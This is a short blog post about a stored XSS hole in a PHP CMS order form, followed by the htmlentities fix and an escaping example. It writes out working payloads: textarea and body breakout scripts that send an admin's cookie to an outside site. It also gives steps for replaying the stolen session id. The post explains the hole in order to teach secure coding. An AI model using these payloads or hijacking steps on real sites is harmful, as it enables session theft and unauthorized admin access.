Wednesday, October 15, 2008

XSS hack into a website through unescaped data

I've told my teammates 1000 times that everything must be escaped, but I still found this terrible PHP code in their projects. This is unprofessional... sigh...

<input id="name" name="name" value="<?php echo htmlspecialchars($row["name"]) ?>" />
<textarea id="address" name="address">
<?php echo $row["address"]?>
</textarea>

The code above is an order form in the backend of a web CMS. $row is read from the database and contains the name and address fields; the form shows the values that the frontend user entered, and each order's info can be modified from the CMS backend.

Here is the note on how this lets someone into the CMS backend without a password.

0. Go to the frontend and enter my info.

1. First, in the name field, I enter my site: "http://www.webmoss.net/?".

2. Second, in the address field, I enter "</textarea><script>location.href=document.all.name.value+document.cookie</script>".

3. If an admin logs in to the CMS backend and views my info, his cookie data is sent to my site directly, including the session id (PHPSESSID). Then I check my www.webmoss.net access log and get the session id and the referer link.

4. Install this cookie editor, https://addons.mozilla.org/en-US/firefox/addon/573,
and copy the session id into the cookie editor. Go to the referer link found in the www.webmoss.net access log.

5. Yo, I saw my info in the backend. This is terrible.


To fix this hole, simply use htmlentities like this:
<?=htmlentities($row["address"],ENT_QUOTES,"UTF-8")?>

I don't want a 1001st time.
Not only the textarea must use htmlentities: every piece of data that is output has to go through htmlentities.
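As an added example (not code from the original post), here is the same order form rendered with one escaping helper applied to every field, fed a constructed $row that carries the textarea breakout payload from the post; the site URL is a placeholder. It shows the payload arriving in the page as inert text instead of a closing tag plus script.

```php
<?php
// Added example: one escaping helper for every interpolated value.
// Escape a value for HTML text content or a quoted attribute.
// ENT_QUOTES also covers single quotes; the charset must match the page's.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
}

// Render the backend order form. Every value passes through h(),
// whether it lands in an attribute or in element content.
function render_order_form(array $row): string
{
    return '<input id="name" name="name" value="' . h($row['name']) . '" />' . "\n"
         . '<textarea id="address" name="address">' . h($row['address']) . '</textarea>' . "\n";
}

// Constructed sample record, as a frontend user could have submitted it
// (the URL is a placeholder, not a real site).
$row = [
    'name'    => 'http://collector.example/?',
    'address' => '</textarea><script>location.href=document.all.name.value+document.cookie</script>',
];

$html = render_order_form($row);
echo $html;

// The breakout never happens: "<" and ">" in the address are now entities,
// so the browser keeps the whole value inside the textarea as plain text.
assert(strpos($html, '</textarea><script>') === false);
assert(strpos($html, '&lt;/textarea&gt;&lt;script&gt;') !== false);
```

Run it with `php example.php`; the printed textarea contains the literal `&lt;/textarea&gt;&lt;script&gt;...` text, and both assertions pass.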

Here is the variant of the code (the same thing works outside a textarea):
"</body><script>location.href=document.all.name.value+document.cookie</script>"

God Bless
